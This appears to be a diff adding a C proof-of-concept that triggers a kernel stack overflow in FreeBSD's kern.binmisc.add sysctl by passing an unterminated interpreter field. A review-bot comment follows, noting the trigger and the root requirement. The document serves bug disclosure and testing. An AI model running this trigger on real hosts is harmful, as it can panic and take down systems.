|
|
@@ -0,0 +1,64 @@ |
|
|
/* |
|
|
|
|
|
PoC for kernel stack overflow in sysctl handler for kern.binmisc.add: |
|
|
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761#c0 |
|
|
|
|
|
su |
|
|
kldload imgact_binmisc |
|
|
./x |
|
|
|
|
|
- CTurt |
|
|
|
|
|
*/ |
|
|
|
|
|
#include <stdio.h> |
|
|
#include <string.h> |
|
|
#include <errno.h> |
|
|
#include <dlfcn.h> |
|
|
#include <sys/types.h> |
|
|
#include <sys/sysctl.h> |
|
|
//#include <sys/imgact_binmisc.h> |
|
|
|
|
|
#define MAXPATHLEN 1024 |
|
|
#define IBE_VERSION 1 |
|
|
#define IBE_ARG_LEN_MAX 256 |
|
|
#define IBE_NAME_MAX 32 |
|
|
#define IBE_INTERP_LEN_MAX (MAXPATHLEN + IBE_ARG_LEN_MAX) |
|
|
#define IBE_MAGIC_MAX 256 |
|
|
|
|
|
typedef struct ximgact_binmisc_entry { |
|
|
uint32_t xbe_version; /* Struct version(IBE_VERSION) */ |
|
|
uint32_t xbe_flags; /* Entry flags (IBF_*) */ |
|
|
uint32_t xbe_moffset; /* Magic offset in header */ |
|
|
uint32_t xbe_msize; /* Magic size */ |
|
|
uint32_t spare[3]; /* Spare fields for future use */ |
|
|
char xbe_name[IBE_NAME_MAX]; /* Unique interpreter name */ |
|
|
char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */ |
|
|
uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */ |
|
|
uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */ |
|
|
} ximgact_binmisc_entry_t; |
|
|
|
|
|
ximgact_binmisc_entry_t xbe; |
|
|
|
|
|
int main(void) { |
|
|
int result = 0; |
|
|
errno = 0; |
|
|
|
|
|
xbe.xbe_version = IBE_VERSION; |
|
|
strcpy(xbe.xbe_name, "CTurt"); |
|
|
|
|
|
memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX); |
|
|
memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX); |
|
|
memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX); |
|
|
|
|
|
xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0; |
|
|
|
|
|
size_t size = sizeof(xbe); |
|
|
|
|
|
result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size); |
|
|
|
|
|
printf("result %d\n", result); |
|
|
printf("errno %d\n", errno); |
|
|
|
|
|
return 0; |
|
|
} |
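Review bot: The PoC never says which field is the actual payload: xbe_interpreter is filled to its full IBE_INTERP_LEN_MAX with 'a' and left without a NUL terminator (which appears to be what the kern.binmisc.add handler trips over), while the only terminator written goes into xbe_mask on the `xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0;` line, a byte mask rather than a string, so a reader cannot tell the trigger from the noise. A comment above the interpreter memset such as `/* deliberately NO NUL terminator in xbe_interpreter -- this is the trigger for bug 206761 */` plus one sentence on why the last mask byte is cleared would make the PoC self-describing. The header comment should also warn that this is meant to be run only in a disposable VM, since a successful trigger presumably panics the whole host, and that the `su` step means the sysctl is exercised as root, so the bug as demonstrated here is root-to-kernel rather than an unprivileged escalation. Reporting could be more useful to a tester: `printf("errno %d (%s)\n", errno, strerror(errno));` instead of the bare number, and `#include <dlfcn.h>` is unused and can be dropped.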